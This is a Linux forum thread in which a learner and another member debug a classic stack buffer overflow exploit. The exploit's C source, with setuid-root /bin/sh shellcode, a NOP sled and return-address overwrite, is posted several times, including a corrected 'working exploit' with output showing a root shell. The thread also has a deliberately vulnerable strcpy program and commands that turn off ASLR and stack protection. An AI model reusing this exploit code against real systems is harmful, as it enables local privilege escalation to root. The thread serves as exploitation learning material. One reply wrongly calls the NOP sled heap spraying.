Find the answer to your Linux question:
Page 1 of 2 1 2 LastLast
Results 1 to 10 of 11
Hi, folks, I was trying to learn what a stack-based buffer overflow is… so I read the book, find the example, code it, but it doesn’t work. My Ubuntu keep ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    May 2011
    Posts
    6

    Angry buffer overflow problem - help !


    Hi, folks,
    I was trying to learn what a stack-based buffer overflow is… so I read the book, find the example, code it, but it doesn’t work. My Ubuntu keep showing message like “Segmentation fault”

    I learned about there are 2 buffer overflow prevention schemes I must turn them off so I can get my program to run, so for those procedures I did were:

    Procedure 0: turn off the random memory address scheme by entering command
     #echo 0 > /proc/sys/kernel/randomize_va_space

    Procedure 1: compile the vulnerable program “vuln.c” with command
     $gcc -fno-stack-protector -o vuln vuln.c
    Source code of vuln.c:

    #include <stdlib.h>
    #include <string.h>
    int main(int argc,char *argv[])
    {
    char buffer[500];
    strcpy(buffer,argv[1]);
    return 0;

    }


    Procedure 2:compile the exploit program,”exploit.c”, which is going to exploit the vuln
     $gcc –o exploit exploit.c
    Source code of exploit.c:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16 \x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\ x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\ x6e\x2f\x73"
    "\x68";

    unsigned long sp(void){ asm("movl %esp, %eax");}

    int main(int argc, char *argv[])
    {
    int i,offset;
    unsigned int esp, ret, *addr_ptr;
    char *buffer, *ptr;
    offset=0;
    esp=sp();
    ret=esp-offset;
    printf("Stack pointer (ESP : 0x%x\n",esp);
    printf(" Offset from ESP : 0x%x\n",offset);
    printf("Desired Return Address : 0x%x\n",ret);

    buffer=malloc(600);
    ptr=buffer;
    addr_ptr=(unsigned int *)ptr;
    for(i=0;i<600;i+=4)
    {
    *(addr_ptr++)=ret;

    }

    for(i=0;i<200;i++)
    {
    buffer[i]='\x90';
    }

    ptr=buffer+200;
    for(i=0;i<strlen(shellcode);i++)
    {
    *(ptr++)=shellcode[i];

    }

    buffer[600-1]=0;

    execl("./vuln","vuln",buffer,(char *)NULL);

    free(buffer);

    return 0;
    }


    Procedure 3 : Run the exploit, it supposed to show me that I got the root privilege since vuln belongs to root, but this part keep showing message “segmentation fault” Please advise me what I should do to make this program successfully demonstrate buffer overflow. Thanks !


    .

  2. #2
    Just Joined!
    Join Date
    May 2011
    Posts
    6
    seems no body knows ... alright...thanks anyway . . .

  3. #3
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,508
    It depends upon how the code was compiled, and what compiler you are using. Some options will trap this sort of exploit now and generate a segfault like you got. Also, what's next in the stack after the offending buffer will determine what happens. Sorry, but I don't have time for an in-depth analysis of your code - I assume it is "cookbook" code that you copied?
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  4. #4
    Just Joined!
    Join Date
    May 2011
    Posts
    6

    Unhappy

    what do you mean "cookbook " ?

  5. #5
    Just Joined!
    Join Date
    May 2011
    Posts
    6

    Smile

    for now I learned there are 3 schemes prevents the stack based buffer overflow...
    1 gcc compiler
    2 linux kernel
    3 CPU with NX bit

    I hope this can save somebody's time in the future ...

  6. #6
    Just Joined!
    Join Date
    May 2009
    Posts
    2
    Hello shanwu, Rubberman,

    shanwu :
    Did you try it on DVL (Damn Vulnerable Linux) ?
    Where did you find this piece of code ?

    Best regards,

  7. #7
    Just Joined!
    Join Date
    Oct 2007
    Posts
    15
    I've been too trying to learn how to exploit stack-based buffer overflow. The code you gave don't seem to work for me either, but here are some of the steps I used to debug your code.

    Check the shellcode
    Code:
    #python -c 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\xC8"' > code
    # ndisasm code 
    00000000  31C0              xor ax,ax
    00000002  B046              mov al,0x46
    00000004  31DB              xor bx,bx
    00000006  31C9              xor cx,cx
    00000008  CD80              int 0x80
    0000000A  EB16              jmp short 0x22
    0000000C  5B                pop bx
    0000000D  31C0              xor ax,ax
    0000000F  884307            mov [bp+di+0x7],al
    00000012  895B08            mov [bp+di+0x8],bx
    00000015  89430C            mov [bp+di+0xc],ax
    00000018  B00B              mov al,0xb
    0000001A  8D4B08            lea cx,[bp+di+0x8]
    0000001D  8D530C            lea dx,[bp+di+0xc]
    00000020  CD80              int 0x80
    00000022  E8E5FF            call word 0xa
    00000025  FF                db 0xff
    00000026  FF2F              jmp word far [bx]
    00000028  62696E            bound bp,[bx+di+0x6e]
    0000002B  2F                das
    0000002C  73C8              jnc 0xfff6
    0000002E  0A                db 0x0a
    The shell code seems fine to me. How about some real debugging !

    Instead of using the
    Code:
    #echo 0 > /proc/sys/kernel/randomize_va_space
    I prefer
    Code:
    setarch 'uname -m' -R /bin/bash
    To debug the code, you have to activate core dump:
    Code:
    ulimit -c unlimited
    Then after running you code, you'ill get this message
    Code:
    # ./exploit 
    Stack pointer (ESP : 0xbffff4f8
     Offset from ESP : 0x0
    Desired Return Address : 0xbffff4f8
    Segmentation fault (core dumped)
    You can check that ASLR is deactivated by checking the ESP pointer is always the same.

    Then you can debug your assembly code by lunching gdb
    Code:
    gdb -q exploit core
    I'm still trying to figure out the problem, I'll post more info later on.

    Greets

  8. #8
    Just Joined!
    Join Date
    Oct 2007
    Posts
    15
    Here is the working exploit and here are some explanations:
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    
    char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";
    
    unsigned long sp(void){ asm("movl %esp, %eax");}
    
    int main(int argc, char *argv[])
    {
    int i,offset;
    unsigned int esp, ret, *addr_ptr;
    char *buffer, *ptr;
     FILE *file;
    
    offset=50;
    esp=sp();
    ret=esp+offset;
    printf("Stack pointer (ESP : 0x%x\n",esp);
    printf(" Offset from ESP : 0x%x\n",offset);
    printf("Desired Return Address : 0x%x\n",ret);
    
    buffer=malloc(600);
    ptr=buffer;
    addr_ptr=(unsigned int *)ptr;
    for(i=0;i<600;i+=4)
    {
      *(addr_ptr++)=ret;
    }
    
    for(i=0;i<200;i++)
    {
      buffer[i]='\x90';
    }
    
    ptr=buffer+200;
    for(i=0;i<strlen(shellcode);i++)
    {
      *(ptr++)=shellcode[i];
    }
    
    buffer[600-1]=0;
    file = fopen("buffer.bin","ab+");
    fprintf(file,"%s",buffer);
    
    execl("./vuln","vuln",buffer,(char *)NULL);
    
    free(buffer);
    
    return 0;
    }
    I'v added some code to write your buffer to file, here are the disassmbly of the buffer:
    Code:
    00000000  90                nop
    00000001  90                nop
    00000002  90                nop
    00000003  90                nop
    00000004  90                nop
    00000005  90                nop
    00000006  90                nop
    00000007  90                nop
    00000008  90                nop
    00000009  90                nop
    0000000A  90                nop
    0000000B  90                nop
    0000000C  90                nop
    0000000D  90                nop
    0000000E  90                nop
    0000000F  90                nop
    00000010  90                nop
    00000011  90                nop
    ...
    000000C6  90                nop
    000000C7  90                nop
    000000C8  31C0              xor ax,ax
    000000CA  B046              mov al,0x46
    000000CC  31DB              xor bx,bx
    000000CE  31C9              xor cx,cx
    000000D0  CD80              int 0x80
    000000D2  EB16              jmp short 0xea
    000000D4  5B                pop bx
    000000D5  31C0              xor ax,ax
    000000D7  884307            mov [bp+di+0x7],al
    000000DA  895B08            mov [bp+di+0x8],bx
    000000DD  89430C            mov [bp+di+0xc],ax
    000000E0  B00B              mov al,0xb
    000000E2  8D4B08            lea cx,[bp+di+0x8]
    000000E5  8D530C            lea dx,[bp+di+0xc]
    000000E8  CD80              int 0x80
    000000EA  E8E5FF            call word 0xd2
    000000ED  FF                db 0xff
    000000EE  FF2F              jmp word far [bx]
    000000F0  62696E            bound bp,[bx+di+0x6e]
    000000F3  2F                das
    000000F4  7368              jnc 0x15e
    000000F6  E1BF              loope 0xb7
    000000F8  98                cbw
    000000F9  DA                db 0xda
    000000FA  E1BF              loope 0xbb
    000000FC  98                cbw
    000000FD  DA                db 0xda
    000000FE  E1BF              loope 0xbf
    00000100  98                cbw
    00000101  DA                db 0xda
    00000102  E1BF              loope 0xc3
    ...
    000006D1  BFF8F4            mov di,0xf4f8
    000006D4  FF                db 0xff
    000006D5  BFF8F4            mov di,0xf4f8
    000006D8  FF                db 0xff
    000006D9  BFF8F4            mov di,0xf4f8
    000006DC  FF                db 0xff
    000006DD  BFF8F4            mov di,0xf4f8
    000006E0  FF                db 0xff
    000006E1  BFF8F4            mov di,0xf4f8
    000006E4  FF                db 0xff
    000006E5  BFF8F4            mov di,0xf4f8
    000006E8  FF                db 0xff
    000006E9  BFF8F4            mov di,0xf4f8
    000006EC  FF                db 0xff
    000006ED  BFF8F4            mov di,0xf4f8
    000006F0  FF                db 0xff
    000006F1  BFF8F4            mov di,0xf4f8
    000006F4  FF                db 0xff
    000006F5  BFF8F4            mov di,0xf4f8
    000006F8  FF                db 0xff
    000006F9  BFF8F4            mov di,0xf4f8
    000006FC  FF                db 0xff
    000006FD  BFF8F4            mov di,0xf4f8
    00000700  FF                db 0xff
    00000701  BFF8F4            mov di,0xf4f8
    00000704  FF                db 0xff
    The first part of the buffer is NOP instructions, if I'm not mistaken, it is a technique called heap spraying used to introduce your shellcode which you can see at the following adress 000000C8.

    The last part of your buffer is the adress where point your buffer, you have so many so that you can overwrite the return adress on the stack.

    The buffer adress was miscalculated, as it points to 4 instructions before your buffer, you can verify it in gdb
    Code:
    x/10i <eip adress>
    so all you have to do is to change the buffer adress (ret variable) by setting the offest to -50 or to 50 and changing the minus sign to a plus sign.

    and voilà !
    Code:
    # ./exploit 
    Stack pointer (ESP : 0xbffff4f8
     Offset from ESP : 0x32
    Desired Return Address : 0xbffff52a
    sh-4.1#

  9. #9
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,508
    I think that the lesson here is that application developers need to guard against buffer overflows with rigor. Back in 1989, I was assigned the job as first formal software QA manager for the startup I was working for. Buffer overflows were the main target of my team's work, and boy did we find a lot of them! The result? A rigorous testing methodology as well as inviolate rules of software development to avoid such stuff. The software is used in major manufacturing sites world wide, including the manufacturing lines used for F117 stealth fighter avionics.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  10. #10
    Just Joined!
    Join Date
    May 2011
    Posts
    6
    Quote Originally Posted by chevalier3as View Post
    Here is the working exploit and here are some explanations:
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    
    char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";
    
    unsigned long sp(void){ asm("movl %esp, %eax");}
    
    int main(int argc, char *argv[])
    {
    int i,offset;
    unsigned int esp, ret, *addr_ptr;
    char *buffer, *ptr;
     FILE *file;
    
    offset=50;
    esp=sp();
    ret=esp+offset;
    printf("Stack pointer (ESP : 0x%x\n",esp);
    printf(" Offset from ESP : 0x%x\n",offset);
    printf("Desired Return Address : 0x%x\n",ret);
    
    buffer=malloc(600);
    ptr=buffer;
    addr_ptr=(unsigned int *)ptr;
    for(i=0;i<600;i+=4)
    {
      *(addr_ptr++)=ret;
    }
    
    for(i=0;i<200;i++)
    {
      buffer[i]='\x90';
    }
    
    ptr=buffer+200;
    for(i=0;i<strlen(shellcode);i++)
    {
      *(ptr++)=shellcode[i];
    }
    
    buffer[600-1]=0;
    file = fopen("buffer.bin","ab+");
    fprintf(file,"%s",buffer);
    
    execl("./vuln","vuln",buffer,(char *)NULL);
    
    free(buffer);
    
    return 0;
    }
    I'v added some code to write your buffer to file, here are the disassmbly of the buffer:
    Code:
    00000000  90                nop
    00000001  90                nop
    00000002  90                nop
    00000003  90                nop
    00000004  90                nop
    00000005  90                nop
    00000006  90                nop
    00000007  90                nop
    00000008  90                nop
    00000009  90                nop
    0000000A  90                nop
    0000000B  90                nop
    0000000C  90                nop
    0000000D  90                nop
    0000000E  90                nop
    0000000F  90                nop
    00000010  90                nop
    00000011  90                nop
    ...
    000000C6  90                nop
    000000C7  90                nop
    000000C8  31C0              xor ax,ax
    000000CA  B046              mov al,0x46
    000000CC  31DB              xor bx,bx
    000000CE  31C9              xor cx,cx
    000000D0  CD80              int 0x80
    000000D2  EB16              jmp short 0xea
    000000D4  5B                pop bx
    000000D5  31C0              xor ax,ax
    000000D7  884307            mov [bp+di+0x7],al
    000000DA  895B08            mov [bp+di+0x8],bx
    000000DD  89430C            mov [bp+di+0xc],ax
    000000E0  B00B              mov al,0xb
    000000E2  8D4B08            lea cx,[bp+di+0x8]
    000000E5  8D530C            lea dx,[bp+di+0xc]
    000000E8  CD80              int 0x80
    000000EA  E8E5FF            call word 0xd2
    000000ED  FF                db 0xff
    000000EE  FF2F              jmp word far [bx]
    000000F0  62696E            bound bp,[bx+di+0x6e]
    000000F3  2F                das
    000000F4  7368              jnc 0x15e
    000000F6  E1BF              loope 0xb7
    000000F8  98                cbw
    000000F9  DA                db 0xda
    000000FA  E1BF              loope 0xbb
    000000FC  98                cbw
    000000FD  DA                db 0xda
    000000FE  E1BF              loope 0xbf
    00000100  98                cbw
    00000101  DA                db 0xda
    00000102  E1BF              loope 0xc3
    ...
    000006D1  BFF8F4            mov di,0xf4f8
    000006D4  FF                db 0xff
    000006D5  BFF8F4            mov di,0xf4f8
    000006D8  FF                db 0xff
    000006D9  BFF8F4            mov di,0xf4f8
    000006DC  FF                db 0xff
    000006DD  BFF8F4            mov di,0xf4f8
    000006E0  FF                db 0xff
    000006E1  BFF8F4            mov di,0xf4f8
    000006E4  FF                db 0xff
    000006E5  BFF8F4            mov di,0xf4f8
    000006E8  FF                db 0xff
    000006E9  BFF8F4            mov di,0xf4f8
    000006EC  FF                db 0xff
    000006ED  BFF8F4            mov di,0xf4f8
    000006F0  FF                db 0xff
    000006F1  BFF8F4            mov di,0xf4f8
    000006F4  FF                db 0xff
    000006F5  BFF8F4            mov di,0xf4f8
    000006F8  FF                db 0xff
    000006F9  BFF8F4            mov di,0xf4f8
    000006FC  FF                db 0xff
    000006FD  BFF8F4            mov di,0xf4f8
    00000700  FF                db 0xff
    00000701  BFF8F4            mov di,0xf4f8
    00000704  FF                db 0xff
    The first part of the buffer is NOP instructions, if I'm not mistaken, it is a technique called heap spraying used to introduce your shellcode which you can see at the following adress 000000C8.

    The last part of your buffer is the adress where point your buffer, you have so many so that you can overwrite the return adress on the stack.

    The buffer adress was miscalculated, as it points to 4 instructions before your buffer, you can verify it in gdb
    Code:
    x/10i <eip adress>
    so all you have to do is to change the buffer adress (ret variable) by setting the offest to -50 or to 50 and changing the minus sign to a plus sign.

    and voilà !
    Code:
    # ./exploit 
    Stack pointer (ESP : 0xbffff4f8
     Offset from ESP : 0x32
    Desired Return Address : 0xbffff52a
    sh-4.1#
    Mr. chevalier3as,
    I have following questions....

    1. Why can't I disable ASLR by command:
    #echo 0 > /proc/sys/kernel/randomize_va_space
    I switched to root and enter above command, and ESP is still changing every time I execute ./exploit.

    2. I am running ubuntu 10.10, i686, when I use setarch, it shows "unrecognized architecture" , what should I do to fix this problem so I can disable ASLR ?

    3. How many buffer overflow schemes have you turned off before you successfully ran your exploit program?

    4. How do you gdb the memory arrangement inside array variable "Buffer " ?

    Thank you for your patience,

Page 1 of 2 1 2 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •